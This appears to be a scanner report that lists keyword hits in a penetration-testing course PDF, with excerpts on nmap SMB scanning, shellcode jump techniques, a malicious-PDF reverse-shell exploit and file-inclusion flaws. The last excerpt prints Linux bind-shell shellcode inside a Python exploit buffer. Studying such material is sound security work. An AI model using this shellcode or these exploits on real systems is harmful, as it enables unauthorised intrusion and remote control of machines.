Detected 2 occurrence(s) of ‘Nmap scan report for’:
ECLABS\WIN-HS8GZGTAPBH$ (RID: 1000) Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds root@bt:~# nmap 192.168.11.221 --script smb-check-vulns.nse Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-11 12:36 EST NSE: Script Scanning completed. Nmap scan report for 192.168.11.221 ... 135/tcp open msrpc 139/tcp open netbios-ssn OS-5777-PWB-Apurva-Rustagi 133 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1025/tcp open NFS-or-IIS 1027/tcp
Detected 69 occurrence(s) of ‘shellcode’:
ce again, we discover that we can use two addition bytes of the file without ruining its structure (bytes 29,30). From this position, we can perform a short jump to our shellcode. After modifying our exploit, we create two “island hops†directly to our shellcode, and finally gain full controlled code execution! OS-5777-PWB-Apurva-Rustagi 262 10.4 MS06-001 – an example from MSF Another horrendous vulnerability in Windows systems was Vulnerability in Graphics Rendering Engine (WMF). This vulnerability affecte
Detected 16 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:
er [-] Creating PDF file 'victim.pdf' DLL file 'output.dll' ... [-] Reading DLL data ... [-] Preparing payload (javascript+shellcode+dll) ... [-] Writing PDF file 'victim.pdf' with payload inside ... [+] Done, [Coromputer] is alive! alive! root@bt:~/CVE-2009-0927_package# Once the file is opened by a vulnerable victim – we should get a reverse shell! OS-5777-PWB-Apurva-Rustagi 255 10.3 MS07-017 – From PoC to Shell One of the nastiest client side attacks ever to hit Microsoft is probably the Microsoft Windows
Detected 2 occurrence(s) of ‘remote file inclusion’:
ck is session specific, meaning that it will work as long as the victim user stays logged on, or until their session expires. These are just a couple of simple examples of how powerful XSS attacks may be. OS-5777-PWB-Apurva-Rustagi 313 13.2 Local and Remote File Inclusion Local and remote include vulnerabilities are commonly found in poorly written PHP code. The exploitation of these vulnerabilities also depends on the web server configuration, specifically php.ini values such as register_globals and allow_url wrappers.
Detected 52 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a" "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" "\x0b\xcd\x80") crash="\x90"*200 + shellcode + "\x43" * 4090 + "\x42\x42\x42\x42" +"D"*7 buffer = "\x11(setup sound " + crash + "\x90\x00#" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[*]Sending evil buffer..."
